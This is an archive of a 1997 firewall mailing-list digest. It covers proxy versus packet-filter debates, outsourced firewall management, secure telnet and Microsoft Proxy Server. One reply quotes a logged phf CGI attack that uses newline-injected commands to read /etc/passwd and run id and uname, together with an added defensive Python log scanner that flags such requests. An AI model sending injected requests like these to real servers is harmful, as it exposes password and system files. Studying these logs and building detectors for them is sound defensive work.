cc: Firewalls@GreatCircle.COM
Subject: Re: getting passwd file via WWW
In-Reply-To: <199706041601.JAA03033@honor.greatcircle.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Stan --

Someone from some.remote.location.edu is attempting to capture your /etc/passwd file (password file). It appears that they may have succeeded. I'd suggest you take your server down (off the internet) until you are able to ensure you have not been compromised. To be safe, you will want to change all of your passwords. Also, remove the cgi-bin scripts if you don't need them, or at least change the permissions on them so that only the script owners have rwx to them.

On Wed, 4 Jun 1997, Stan Wnuck wrote:

> Hi all,
>
> I have noticed on my WWW log files the following 2 entries.
>
> some.remote.location.edu - - [28/Apr/1997:01:33:21 +0015] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0Aypcat%20passwd%0Apwd%0Aid%0Auname%20-a%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 140
> some.remote.location.edu - - [28/Apr/1997:01:33:23 -74587788] "GET /cgi-bin/php.cgi?/etc/passwd" 404 143
>
> Does anyone know anything about these cgi scripts or programs?
> Or how dangerous this is?
>
> I changed the real source location to a fake some.remote.location.edu to not let out the bag of the source of this hack, since I am not sure what my next move would be.
>
> Thanks in advance.
>
> Stan Wnuck                               swnuck@unixpros.com
> Unixpros, Inc.
> 10 Industrial Way East                   (908) 389-3295 x542
> Eatontown, NJ 07724                      (908) 389-5461 Fax
>
> PM-CHS Technology Insertion Office
> Ft. Monmouth Army Base, NJ               (908) 427-2033 / 427-6963
>

|/ ---o0o-@@-o0o---------
Gary G. Hull - Technical Consultant
Howard Systems International - Glaxo Wellcome Inc.
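A defender-side check for the two log entries quoted above, added here as an example and not code from the original post: it parses Common Log Format lines, URL-decodes the request, pulls out the commands smuggled into the phf query through %0A newlines, and uses the status code to judge whether the attempt got an answer. The first two sample lines are taken from the message (the poster had already replaced the real client host name); the third, benign line is constructed.

```python
"""Flag phf-style CGI abuse in Common Log Format (CLF) web server logs.

Added example for the log entries quoted in the message above; it is not
code from the original post.  SAMPLE_LOG is built from those two entries
plus one constructed benign request.
"""
import re
from typing import List, Optional
from urllib.parse import unquote

# host ident user [time] "method path [protocol]" status size
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>\S+))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)

# CGI programs named in the log entries; both were abused in 1997 to run
# commands on, or read files from, the web server
SUSPECT_CGI = ("/cgi-bin/phf", "/cgi-bin/php.cgi")

SAMPLE_LOG = [
    'some.remote.location.edu - - [28/Apr/1997:01:33:21 +0015] '
    '"GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0Aypcat%20passwd'
    '%0Apwd%0Aid%0Auname%20-a%0A&Qalias=&Qname=foo&Qemail=&Qnickname='
    '&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 140',
    'some.remote.location.edu - - [28/Apr/1997:01:33:23 -74587788] '
    '"GET /cgi-bin/php.cgi?/etc/passwd" 404 143',
    # constructed ordinary request; must not be flagged
    'client.example.net - - [28/Apr/1997:01:35:02 +0000] '
    '"GET /index.html HTTP/1.0" 200 2048',
]


def injected_commands(decoded_path: str) -> List[str]:
    """Return shell commands smuggled into a phf query via %0A (newline).

    phf handed its query values to a shell without stripping newlines, so
    every decoded line after the first is a separate command.
    """
    if "?" not in decoded_path:
        return []
    query = decoded_path.split("?", 1)[1]
    commands = []
    for segment in query.split("\n")[1:]:
        # stop at the next CGI parameter, e.g. "&Qalias="
        segment = segment.split("&", 1)[0].strip()
        if segment:
            commands.append(segment)
    return commands


def analyse(line: str) -> Optional[dict]:
    """Return a finding for a suspicious request, or None for a benign one."""
    m = CLF_RE.match(line)
    if not m:
        return None
    decoded = unquote(m.group("path"))
    reasons = []
    if decoded.startswith(SUSPECT_CGI):
        reasons.append("request to abused CGI program")
    commands = injected_commands(decoded) if decoded.startswith("/cgi-bin/phf") else []
    if commands:
        reasons.append("newline-injected commands")
    if "/etc/passwd" in decoded:
        reasons.append("password file requested")
    if not reasons:
        return None
    status = int(m.group("status"))
    return {
        "host": m.group("host"),
        "time": m.group("time"),
        "decoded_path": decoded,
        "commands": commands,
        "status": status,
        # 200 means the CGI program existed and answered; 404 means the
        # script was not installed, so that particular attempt failed.
        "likely_succeeded": status == 200,
        "reasons": reasons,
    }


def scan(lines) -> List[dict]:
    """Run analyse() over an iterable of CLF lines and keep the findings."""
    return [f for f in (analyse(line) for line in lines) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["host"], finding["status"], finding["reasons"], finding["commands"])
```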
Five Moore Drive - Raleigh, North Carolina 27709
Tel : (919) 941-4867 - Fax : (919) 483-0056
email: ggh14854@ussun2f.glaxo.com

From owner-firewalls-outgoing Wed Jun 4 20:30:23 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id UAA09611 for firewalls-outgoing; Wed, 4 Jun 1997 20:17:20 -0700 (PDT)
Received: from relay6.UU.NET (relay6.UU.NET [192.48.96.16]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id UAA09584 for ; Wed, 4 Jun 1997 20:17:02 -0700 (PDT)
Received: from netevolve.com by relay6.UU.NET with SMTP (peer crosschecked as: [206.136.48.11]) id QQcsoj19473; Wed, 4 Jun 1997 23:21:10 -0400 (EDT)
Received: from irwin-s-home-pc ([207.226.56.152]) by netevolve.com (4.1/SMI-4.1) id AA06113; Wed, 4 Jun 97 23:24:02 EDT
Message-Id: <3.0.1.32.19970604232411.00969400@netevolve.com>
X-Sender: lazar@netevolve.com
X-Mailer: Windows Eudora Pro Version 3.0.1 (32)
Date: Wed, 04 Jun 1997 23:24:11 -0400
To: Mike Hedlund , zzIML Firewalls
From: Irwin Lazar
Subject: Re: Do people host WWW servers behind firewalls?
Cc: "'Firewalls@GreatCircle.COM'"
In-Reply-To:
References: <103BEF1175D2D011B83400A0C903EE964331@hurricane.vnw.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 05:35 PM 6/4/97 -0700, Mike Hedlund wrote:
>
>
>On Wed, 4 Jun 1997, zzIML Firewalls wrote:
>
>> This has been an ongoing planning debate for us... does the potential latency and overhead of a firewall potentially point toward putting high-access high-performance WWW servers on the net without a firewall? Is there a true trade-off of "security vs. performance"?
>>
>
>A firewall doesn't necessarily mean you're secure. Carefully securing your machine(s) at a host level is a good way to start. It's amazing how many large sites out there don't do basic audits of their own sites, i.e. disabling all nonessential services, etc.
>The more possible entry points you eliminate for an intruder, the harder it will be for them to get in. And by making it more difficult to get in, hopefully they have to do something which you will notice.
>
>> Presume that the WWW servers are at a co-location ISP site and don't have any "critical data" on them. They are mostly publish sites...
>>
>
>I think for most organizations, who put money into developing a site on the net, be it web/ftp/chat whatever, have a vested interest in keeping it secure. Not because they are worried about people seeing data they shouldn't see, but because of the publicity you will get after being hacked.. i could see it now.. some CEO of a big company turns on CNN to hear a story about how a 12 year old kid hacked his company's website from school and put up a banner saying 'Im g0d'. It doesn't matter if the kid got anything important.
>

That is a very good point. For those who run web servers on Solaris boxes, there is a very good FAQ on how to secure it at http://www.sun.com/sunworldonline/common/security-faq.html. There are quite a few services that can be turned off, and quite a few extras that aren't needed.

From owner-firewalls-outgoing Wed Jun 4 20:45:42 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id UAA12481 for firewalls-outgoing; Wed, 4 Jun 1997 20:29:21 -0700 (PDT)
Received: from relay1.shore.net (relay1.shore.net [192.233.85.129]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id UAA12356 for ; Wed, 4 Jun 1997 20:28:51 -0700 (PDT)
Received: from [198.115.179.81] (vin.shore.net [198.115.179.81]) by relay1.shore.net (8.8.3/8.8.3) with ESMTP id XAA20937; Wed, 4 Jun 1997 23:31:46 -0400 (EDT)
Message-Id:
In-Reply-To:
References: <33956E4A.6590018C@pvt.net>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Wed, 4 Jun 1997 23:34:01 -0500
To: Jose Luis Delgado
From: Vin McLellan
Subject: Re: Secure Telnet!
Cc: firewalls@greatcircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Jose Luis Delgado asked:

>Does anybody know, where can I find shareware/freeware SECURE telnet for NT???

As you probably know, F-Secure (commercial SSH from Datafellows) has NT clients and servers for SSH. But, unfortunately, it is neither free nor freeware.

I haven't seen nor heard much about STEL (Secure Telnet) in the past year (not a great sign ;-) but you might check out the current STEL package at the Italian CERT, based at U of Milan, to see if their Secure Telnet (STEL) has been extended to NT: ftp://idea.sec.dsi.unimi.it/pub/security/cert-it/

If that doesn't pan out, do a search at COAST, the huge archive at Purdue University, always worth the visit: http://www.cs.purdue.edu/coast/

You might also toss a query to the growing cult of those obsessed with improving NT security: the subscribers of ISS's NT-Security List. There is probably an NT-Security archive at the ISS web site.

Another possible resource: check Russ Cooper's NT-Bugtraq archives at http://ntbugtraq.rc.on.ca/archives/ntbugtraq.html

I, for one, would appreciate it if you would report back to this List if you find something free/cheap and useful.
Suerte, _Vin Vin McLellan + The Privacy Guild + 53 Nichols St., Chelsea, MA 02150 USA <617> 884-5548 -- <@><@> -- From owner-firewalls-outgoing Wed Jun 4 20:58:31 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA27370 for firewalls-outgoing; Wed, 4 Jun 1997 11:15:11 -0700 (PDT) Received: from inet02.us.abatos.com (gatekeep.us.landisgyr.com [206.175.68.122]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA27291 for ; Wed, 4 Jun 1997 11:14:50 -0700 (PDT) Received: by inet02.us.abatos.com; id OAA10756; Wed, 4 Jun 1997 14:20:25 -0400 (EDT) Received: from inet05.us.abatos.com(204.207.110.249) by gatekeep.us.landisgyr.com via smap (3.2) id xma010752; Wed, 4 Jun 97 14:20:24 -0400 Received: by news.us.landisstaefa.com; id MAA31052; Wed, 4 Jun 1997 12:19:15 -0500 Received: by usbgrexch01.us.landisstaefa.com with Internet Mail Service (5.0.1457.3) id ; Wed, 4 Jun 1997 13:17:39 -0500 Message-ID: <0C673F68C3A0D011A94208002BE526253535@usbgrexch01.us.landisstaefa.com> From: "Kohn, Joav" To: "'Mariko Yashada'" Cc: Firewalls Mailing List Subject: RE: ISP Connection Date: Wed, 4 Jun 1997 13:17:36 -0500 X-Priority: 3 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.0.1457.3) Content-Type: text/plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk mariko: how you manage the firewall is a delicate balance. having an outside vendor take care of management simplifies things greatly for your organization, gives you an expert on the product, but also means that your needs and concerns regarding the firewall are weighed against their other clients. it really boils down to a matter of trust. outside management of your firewall means trusting an outside company with access to your corporate network. you have to do a gut check to see how you feel about that, as well as with some guys in legal. 
the main issue with security is not simply getting the f/w to work, but most importantly being able to monitor the activity and have it reflect your corporate security policies. if an outside firm isn't going to keep on top of the box, you really don't know how secure you are. alternatively, the same is true if you don't know what to monitor for. from personal experience, we had a similar setup here initially, with an outside vendor administering our firewall, but on-site & by phone only. it soon became clear that to get the product to work the way we wanted to and to get the security we felt we needed, we had to bring the staff in here to do it. (otherwise i wouldn't be typing this message). -joav kohn sr. technical consultant it/workgroup communications landis & staefa > -----Original Message----- > From: Mariko Yashada [SMTP:mariko@grfn.org] > Sent: Wednesday, June 04, 1997 2:01 PM > To: Firewalls Mailing List > Subject: Re: ISP Connection > > There is another local ISP who will connect us at T1 and install a > firewall > at our location. They will then administer the firewall remotely from > their > location. They support three different firewalls, Gauntlet, Firewall-1 > and > Borderware. The advantage is the savings in admin costs. Has anyone > had any > experience with this type of arrangement? We have also talked to BBN > about > their Site Patrol product, which is a remotely managed Gauntlet. 
>

From owner-firewalls-outgoing Wed Jun 4 20:59:21 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA29974 for firewalls-outgoing; Wed, 4 Jun 1997 14:07:59 -0700 (PDT)
Received: from pse01.pios.com (PSE01.PIOS.COM [199.33.129.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id OAA29956 for ; Wed, 4 Jun 1997 14:07:48 -0700 (PDT)
Received: by pse01.pios.com; (5.65v3.2/1.3/10May95) id AA28853; Wed, 4 Jun 1997 17:11:27 -0400
Received: from vaxa.PIOS.COM (vaxa.PIOS.COM) by gemini.pios.com (PMDF V5.0-6 #18985) id <01IJOKRB5HBK8WY06V@gemini.pios.com> for firewalls@greatcircle.com; Wed, 04 Jun 1997 17:13:25 -0400 (EDT)
Received: from cal_177.sanjose (192.168.14.7) by PIOS.PIOS.COM (PMDF V5.0-6 #18984) id <01IJOKOXCUYO8Y5URK@PIOS.PIOS.COM> for firewalls@greatcircle.com; Wed, 04 Jun 1997 17:11:31 -0400 (EDT)
Date: Wed, 04 Jun 1997 14:15:23 -0700
From: Bill Stout
Subject: RE: PIX and Firewall-1
X-Sender: stoutb@vaxf.pios.com
To: firewalls@greatcircle.com
Message-Id: <2.2.32.19970604211523.0070ff68@vaxf.pios.com>
Mime-Version: 1.0
X-Mailer: Windows Eudora Pro Version 2.2 (32)
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7BIT
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Peter Carlson writes....

>in what way are application level gateways more secure than, say, FW-1 or PIX? There are certainly capabilities that can be provided via application proxies that can't be provided by any filter-based technologies, but what types of attacks are a FW-1 or a PIX vulnerable to that application proxies aren't?

Do not replace a proxy server with a 'State-based Firewall'.

State-based or packet filter firewalls are being marketed well. Engineers who work for these companies know better than to replace proxies with filters, but they're not stupid enough to kill potential sales. ;)

Application proxies monitor commands sent at the application layer, and reconstruct packets so that IP attacks can't be sent beyond the firewall. (From what I understand), State-based (a.k.a. enhanced extended packet filter) security devices inspect the first packet that comes across with enhanced extended filtering rules and can include additional authentication. If that packet passes all filtering rules, remaining packets of that session are passed through without inspection.

A properly configured (Internet) firewall comprises a proxy server protected from the Internet by a packet filter. The better the packet filter (state-based or extended filter), the less work the proxy server has to do as far as inspecting/denying traffic. The packet filter can also protect the proxy server from misc. IP-based attacks.

Good applications for packet filter/State-based firewalls are low-security internet feeds and fast low-latency intranet (10/100/155MB/...) security filtering. Not everyone needs a full application proxy firewall, a subject that comes up when I visit Mom-and-Pop small businesses that want a single feed for their 10 PCs.

IMHO - State-based firewalls are 'only' packet filters, and for the corporate environment should not replace the traditional proxy server, but work in conjunction with one.

_____________________________________________________________________________
Bill Stout (Systems Engineer/Consultant)              stoutb@pios.com
Pioneer Standard (Computer Systems & Components)      http://www.pios.com/
San Jose, CA (Location of 1 of 52 U.S.
offices)                                              (408) 954-9100
*My opinions do not reflect that of the company, and vice versa, thankfully.*

From owner-firewalls-outgoing Wed Jun 4 22:30:37 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id WAA08125 for firewalls-outgoing; Wed, 4 Jun 1997 22:12:54 -0700 (PDT)
Received: from goliath.camtech.com.au (goliath.camtech.net.au [203.5.73.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id WAA08108 for ; Wed, 4 Jun 1997 22:12:47 -0700 (PDT)
Received: from sebastion.sa.camtech.com.au (sebastion.sa.camtech.com.au [203.28.3.2]) by goliath.camtech.com.au (8.8.5/8.8.2) with ESMTP id OAA26641 for ; Thu, 5 Jun 1997 14:46:09 +0930 (CST)
Received: (from uucp@localhost) by sebastion.sa.camtech.com.au (8.6.10/8.6.10) id OAA07896 for ; Thu, 5 Jun 1997 14:47:15 +0930
Received: from slingshot(192.168.1.2) by sebastion via smap (V1.3) id sma007877; Thu Jun 5 14:47:05 1997
Received: from tossa (tossa [192.168.1.3]) by slingshot.camtech.com.au (8.6.12/8.6.12) with SMTP id OAA23079 for ; Thu, 5 Jun 1997 14:39:06 +0930
Date: Thu, 5 Jun 1997 14:45:09 +0930 (CST)
From: David Murray
Reply-To: David Murray
Subject: SMTP-MSmail
To: firewalls@GreatCircle.COM
In-Reply-To: "Your message with ID"
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi,

This is a little off topic, so I apologise. However, does anyone know of a commercial product that has the functionality for translating MSMail to SMTP, and if possible runs on a Unix box.

TIA

Dave.

_______________________________________________________________________________
David Murray,                             Phone: +61 8 8303 3300
Systems Engineer,                         Fax:   +61 8 8303 4403
Camtech Group Pty. Ltd.                   Email: dmurray@camtech.com.au
PO Box 128,                               8th Floor,
Rundle Mall,                              10 Pulteney Street,
Adelaide SA 5000,                         Adelaide, South Australia,
South Australia, Australia.               Australia.
5000 ______________________________________________________________________________ From owner-firewalls-outgoing Wed Jun 4 22:45:30 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id UAA18830 for firewalls-outgoing; Wed, 4 Jun 1997 20:58:14 -0700 (PDT) Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id UAA17344 for ; Wed, 4 Jun 1997 20:51:00 -0700 (PDT) Received: from woody.wcnet.org (woody.wcnet.org [205.133.171.1]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with SMTP id UAA03029 for ; Wed, 4 Jun 1997 20:27:21 -0700 (PDT) Received: from ppp-198-10.bgsu.edu by woody.wcnet.org (5.x/SMI-SVR4) id AB05979; Wed, 4 Jun 1997 23:23:57 -0400 Message-Id: <3.0.1.32.19970604232259.009d55c0@woody.wcnet.org> X-Sender: zawodny@woody.wcnet.org X-Mailer: Windows Eudora Pro Version 3.0.1 (32) Date: Wed, 04 Jun 1997 23:22:59 -0400 To: Wong , Daniel_Yamaguchi@iscci.com, Jan Guldentops , "Jeremy D. Zawodny" From: "Jeremy D. Zawodny" Subject: Re: Microsoft Proxy Server Cc: firewalls@GreatCircle.COM In-Reply-To: <33956691.57F6@pdx.com.my> References: <882564A1.00018A6A.00@isc_domino.iscci.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 08:58 PM 6/4/97 +0800, Wong wrote: >On 23 May 1997, Daniel_Yamaguchi@iscci.com wrote: >> >> All About MickySoft Proxy Server >> >> Security (...???) >> >> Microsoft's Proxy Server was subjected to extensive security testing and >> evaluation from independent testing agency, Coopers & Lybrand's Information >> Technology Security Services and is resistant to common attacks such as "IP >> Spoofing", 'SATAN", and "ISS." >> >C & L is an accounting and consulting firm (correct me if I'm wrong). >What do >they know about TCP/IP ports, filters (packet-level, application-level), >encryption etc ? 
>They might talk about this and that, but do they know how to configure a proxy server or a firewall ?

Quite a lot, I'd imagine--that is, if they're anything like their peers: Andersen Consulting, Ernst & Young, etc... Much of their business now comes from consulting on topics like network security, architectures, and so on. You'd be surprised, I think.

How do I know? I almost went to work for Ernst & Young Consulting and met some of their best people. They *do* know their stuff.

>> Manageability & Ease of Use
>>
>> Integrated with NT User Directory Services, Microsoft Proxy Server allows:
>>
>Directory Service? Are you sure? Using NOVELL NDS or BANYAN Streetalk ? Or LDAP?

As the message said, MS Proxy uses NT's directory services (as in their domain security model) to perform authorization and authentication.

>> Easy Administration provided by a clean, easy to understand and easy to administer interface.
>>
>How do you administer multiple servers? And they are spread nation-wide? Unless you are running NetWare 4.x or Banyan.

If they're all part of the same master domain, you administer them the same way you'd administer any other NT services running on many NT boxes on a WAN. This is really a non sequitur.

>> Remote Administration via Internet Service Manager allows Microsoft Proxy Server to be managed from any Windows NT system on the network.
>>
>I thought only NetWare have a utility called "rconsole" ?

What's your point?

>> Web Proxy
>>
>> Multi-Platform Support - The Web Proxy Server supports all platforms including:
>> Windows NT Server
>> Windows NT Workstation
>> Windows '95
>> Windows for Workgroups/Win 3.1
>> UNIX
>> Macintosh
>Does IE run on Macintosh or UNIX? NETSCAPE Navigator can.

IE runs on the Mac, but not on Unix. What's that have to do with anything? It's a proxy server--any up-to-date browser can talk to it.
>> Integrates with NT network security domain model - Microsoft Proxy Server extensively leverages the network-based Windows NT domain security model to manage access permission and logging.
>>
>You must use "Trust" to connect those domains together. And, the "Trust" can be compromised to make the NT trust anybody. Sounds scary . . . .!

Assuming you have multiple domains, yes. If you run in a Master Domain model (as many companies do), then the trust is there anyway. Again, this is a non sequitur. The features you are picking at are NT features and have little to do with their proxy server, let alone firewalls (which is what this list is about).

>> Massive Scalability - Microsoft Proxy Server's cache is limited only by Windows NT Server system resources.
>>
>Can NT scale up to 64 processors, like the SUN servers? Or 12 processors, like the Alpha servers.

No.

>Well guys, this is normal MickySoft marketing hype.

And you're surprised?

>On 24 May 1997, Jan wrote:
>>Let's put the record straight: if you are running MS-machines you'll need a complete firewall to shield it all off. Or you can believe all the marketing hype and leave your network completely open....
>
>I agree with what you said.
>
>>At 01:39 AM 5/24/97 -0400, Todd Graham Lewis wrote:
>>>On Fri, 23 May 1997 Daniel_Yamaguchi@iscci.com wrote:
>>>
>>>> We, at ISC Computers & Communications, Inc. feel that this solution will meet your current needs regarding Internet Security.
>>>
>>>I, at 1025 Greenwood Avenue Apartment 3 in Atlanta, do not.
>
>>Great... *Why not?*
>
>You can scroll-up to know why, Jeremy.

I did, and what I saw was an obviously biased view against Microsoft. Your apparent dislike of NT has made it difficult for you to put their product in perspective--to figure out where it *makes sense* and does not.

Jeremy
---
Jeremy D. Zawodny
WCNet Technical Geek & Web Stuff
"You are what you think."
From owner-firewalls-outgoing Wed Jun 4 23:00:28 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id WAA13188 for firewalls-outgoing; Wed, 4 Jun 1997 22:58:48 -0700 (PDT)
Received: from gate (MNA-cal-mcc-a-pvc253.econnect.net [204.50.214.50]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id WAA13120 for ; Wed, 4 Jun 1997 22:58:28 -0700 (PDT)
Received: from a01fs002.nsci.net ([10.1.1.20]) by gate.mcc.net with ESMTP id <324862-14624>; Thu, 5 Jun 1997 00:01:44 -0600
Received: by A01FS002.mcc.net with Internet Mail Service (5.0.1457.3) id ; Thu, 5 Jun 1997 00:01:25 -0600
Message-ID:
From: "Paquette, Trevor"
To: "'Walczak, Joe'" , "'firewalls@greatcircle.com'"
Subject: RE: ISP Connection
Date: Thu, 5 Jun 1997 00:01:24 -0600
X-Priority: 3
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.0.1457.3)
Content-Type: text/plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Your opinion. And I respect that.

The problem here is that you do not TRUST anyone else to manage or operate your firewall. That is the issue. Not if they can do it or not. It is a simple matter of trust.

There are companies (mine included) that do manage firewalls for other companies, and we do a pretty damn good job at it. Our clients TRUST us to do it for them. WE are the ones on the hook for any break-ins and possible damage resulting from any outside security incidents.

By having others manage their firewall for them, our clients are free from the headaches and hassles of dealing with daily firewall issues. They can concentrate and place their own IT folks in areas that they feel are needed and best used. If that happens to be running a firewall, then great. But if they want the benefit of a secure, reliable and stable Internet connection, but don't have the time, know-how, or need of a firewall administrator, then having someone else run your firewall for you makes perfect business sense.
> -----Original Message-----
> From: Walczak, Joe [SMTP:Joe.Walczak@transquest.com]
> Sent: Wednesday, June 04, 1997 12:40 PM
> To: 'firewalls@greatcircle.com'
> Subject: RE: ISP Connection
>
>
> My only comment here is that I would not let ANYONE else manage/operate my firewall, ISP or not!!! Secondly, I would not tell anyone which firewall I am using. The ISP does not need to know that information.
>
> Joe Walczak
> joe.walczak@transquest.com
>
> >----------
> >From: Mariko Yashada[SMTP:mariko@grfn.org]
> >Sent: Wednesday, June 04, 1997 3:01 PM
> >To: Firewalls Mailing List
> >Subject: Re: ISP Connection
> >
> >Thank you for all your comments. Last fall our plan was to connect to the Internet through MCI. We security people said fine, but you will need a firewall for any connections between the Internet and the Enterprise Network. So we did an evaluation of firewalls and settled on two we felt best suited our needs. The firewall added enough cost to the project that it was postponed. It has now been revived using our ISP for the connection with the hope the ISP can some way offer the security. I see now we should follow our original plan and put up a firewall at our end.
> >
> >Here is a related question:
> >
> >There is another local ISP who will connect us at T1 and install a firewall at our location. They will then administer the firewall remotely from their location. They support three different firewalls, Gauntlet, Firewall-1 and Borderware. The advantage is the savings in admin costs. Has anyone had any experience with this type of arrangement? We have also talked to BBN about their Site Patrol product, which is a remotely managed Gauntlet.
> >
> >Thanks,
> >
> >Mariko
>

From owner-firewalls-outgoing Wed Jun 4 23:15:50 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id XAA14828 for firewalls-outgoing; Wed, 4 Jun 1997 23:09:48 -0700 (PDT)
Received: from ACSacs.Com (sprite.acsacs.com [206.16.240.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id XAA14774 for ; Wed, 4 Jun 1997 23:09:35 -0700 (PDT)
Date: Wed, 4 Jun 1997 23:13:47 -0700
From: "Daniel J Blander - Sr. Systems Engineer for ACS"
X-Sender: phaedrus@ferrari
Reply-To: "Daniel J Blander - Sr. Systems Engineer for ACS"
To: Cy Ardoin
cc: firewalls@greatcircle.com
Subject: RE: PIX and FW-1 (packet filter Question)
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

While I don't disagree with what I think was your underlying thought - that packet filters and stateful-inspection firewalls are good, I think this statement is dangerously incorrect:

On Wed, 4 Jun 1997, Cy Ardoin wrote:
> I don't think there is anything an application firewall can
> do that can't also be done by a "packet filter" firewall.

An application firewall specifically controls the content - ie. the commands, functions, etcetera, that can be passed through a given communications session. An application firewall (proxy) can help me to block Pointcast through port 80 by saying that I won't let certain application layer calls occur through port 80. An application firewall can help me to control things that can occur via SMTP (VRFY, EXPN, DEBUG, et.al.)

Be careful. Stateful Inspection and Packet filters are good at controlling the IP's that get access, controlling the direction of the session, preventing against spoofing, doing basic service blocking, and making certain that the session is absolutely in sync (SYN's, ACK's, FIN's and RST's) but they do not handle content at the application level.
Packet filters work (in general terms) at the Network Layer
Stateful-inspection firewalls work at the Network and Transport Layer
Application firewalls work at the Application Layer

The three should not be considered enemies. They are all important - and the best firewalls have all three on their side.....

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Daniel Blander =8^)
Sr. Systems Engineer
Applied Computer Solutions
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Phone: (714) 842.7800
Fax: (714) 842.8299
Email: Daniel.Blander@acsacs.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.acsacs.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From owner-firewalls-outgoing Wed Jun 4 23:39:39 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA29552 for firewalls-outgoing; Wed, 4 Jun 1997 14:05:57 -0700 (PDT)
Received: from pse01.pios.com (PSE01.PIOS.COM [199.33.129.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id OAA29462 for ; Wed, 4 Jun 1997 14:05:35 -0700 (PDT)
Received: by pse01.pios.com; (5.65v3.2/1.3/10May95) id AA17632; Wed, 4 Jun 1997 17:09:14 -0400
Received: from vaxd.PIOS.COM (vaxd.PIOS.COM) by gemini.pios.com (PMDF V5.0-6 #18985) id <01IJOKOK878G8WY05K@gemini.pios.com> for firewalls@greatcircle.com; Wed, 04 Jun 1997 17:11:12 -0400 (EDT)
Received: from cal_177.sanjose (192.168.14.7) by PIOS.PIOS.COM (PMDF V5.0-6 #18984) id <01IJOKLDQV3K8Y5E4U@PIOS.PIOS.COM> for firewalls@greatcircle.com; Wed, 04 Jun 1997 17:08:40 -0400 (EDT)
Date: Wed, 04 Jun 1997 14:12:31 -0700
From: Bill Stout
Subject: RE: PIX and Firewall-1
X-Sender: stoutb@vaxf.pios.com
To: firewalls@greatcircle.com
Message-Id: <2.2.32.19970604211231.00a0f4dc@vaxf.pios.com>
Mime-Version: 1.0
X-Mailer: Windows Eudora Pro Version 2.2 (32)
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7BIT
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Peter Carlson writes....
>in what way are application level gateways more secure than, say, FW-1 or PIX?
>There are certainly capabilities that can be provided via application
>proxies that can't be provided by any filter-based technologies, but what
>types of attacks are a FW-1 or a PIX vulnerable to that application
>proxies aren't?

Do not replace a proxy server with a 'State-based Firewall'. State-based or packet filter firewalls are being marketed well. Engineers who work for these companies know better than to replace proxies with filters, but they're not stupid enough to kill potential sales. ;)

Application proxies monitor commands sent at the application layer, and reconstruct packets so that IP attacks can't be sent beyond the firewall.

(From what I understand), State-based (a.k.a. enhanced extended packet filter) security devices inspect the first packet that comes across with enhanced extended filtering rules and can include additional authentication. If that packet passes all filtering rules, remaining packets of that session are passed through without inspection.

